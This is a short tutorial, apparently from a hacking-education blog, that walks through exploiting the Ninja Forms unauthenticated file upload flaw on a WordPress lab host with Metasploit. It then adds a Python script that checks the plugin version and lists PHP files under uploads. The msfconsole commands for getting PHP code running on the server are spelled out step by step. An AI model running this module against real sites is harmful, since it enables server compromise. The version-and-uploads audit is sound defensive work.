Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain an unauthenticated file upload vulnerability, allowing guests to upload arbitrary PHP code that can be executed in the context of the web server.
Exploit Targets
Ninja Forms 2.9.36
Requirement
Attacker: Kali Linux
Victim PC: WordPress
Open a Kali terminal and type msfconsole
Now type: use exploit/unix/webapp/wp_ninja_forms_unauthenticated_file_upload
msf exploit (wp_ninja_forms_unauthenticated_file_upload) > set targeturi /wordpress/
msf exploit (wp_ninja_forms_unauthenticated_file_upload) > set rhost 192.168.0.106 (IP of the remote host)
msf exploit (wp_ninja_forms_unauthenticated_file_upload) > set form_path /test/
msf exploit (wp_ninja_forms_unauthenticated_file_upload) > set rport 80
msf exploit (wp_ninja_forms_unauthenticated_file_upload) > exploit
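To check whether a site you administer is exposed, the following added example (not part of the original post or of Metasploit) reads the installed plugin's Version header, compares it with the affected range 2.9.36 to 2.9.42 stated above, and lists PHP-executable files under the uploads tree. The paths wp-content/plugins/ninja-forms/ninja-forms.php and wp-content/uploads, and the extension list, are assumptions about a default WordPress layout.

```python
import re
import sys
from pathlib import Path

# Affected range as stated on this page (inclusive).
VULN_MIN, VULN_MAX = (2, 9, 36), (2, 9, 42)
# Extensions commonly handed to the PHP interpreter (assumed; match your server config).
PHP_EXTS = {".php", ".phtml", ".php5", ".phar"}

def plugin_version(header_text):
    """Extract the 'Version:' field from a WordPress plugin header comment."""
    m = re.search(r"^[ \t/*#@]*Version:\s*([0-9]+(?:\.[0-9]+)*)",
                  header_text, re.M | re.I)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def is_vulnerable(version):
    """True if the first three version components fall in the affected range."""
    if version is None:
        return False
    v = (version + (0, 0, 0))[:3]  # pad "3.0" and truncate "2.9.40.1"
    return VULN_MIN <= v <= VULN_MAX

def php_files_in_uploads(uploads_dir):
    """Files whose name carries a PHP extension anywhere, e.g. x.php or x.php.jpg."""
    root = Path(uploads_dir)
    if not root.is_dir():
        return []
    return sorted(p for p in root.rglob("*")
                  if p.is_file() and PHP_EXTS & {s.lower() for s in p.suffixes})

def audit(wp_root):
    """Report the plugin version, whether it is affected, and PHP files in uploads."""
    wp_root = Path(wp_root)
    # Assumed default install path of the plugin's main file.
    main = wp_root / "wp-content/plugins/ninja-forms/ninja-forms.php"
    version = None
    if main.is_file():
        version = plugin_version(main.read_text(errors="replace")[:8192])
    return {"version": version,
            "vulnerable": is_vulnerable(version),
            "php_in_uploads": php_files_in_uploads(wp_root / "wp-content/uploads")}

if __name__ == "__main__" and len(sys.argv) == 2:
    report = audit(sys.argv[1])
    print("Ninja Forms version:", report["version"], "| affected:", report["vulnerable"])
    for path in report["php_in_uploads"]:
        print("PHP file in uploads:", path)
```

Run it with the WordPress root directory as the only argument. A PHP file under uploads is not proof of compromise on its own, but on a site running an affected version each one should be reviewed.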
The post Hacking WordPress using Ninja Forms Unauthenticated File Upload appeared first on Hacking Articles.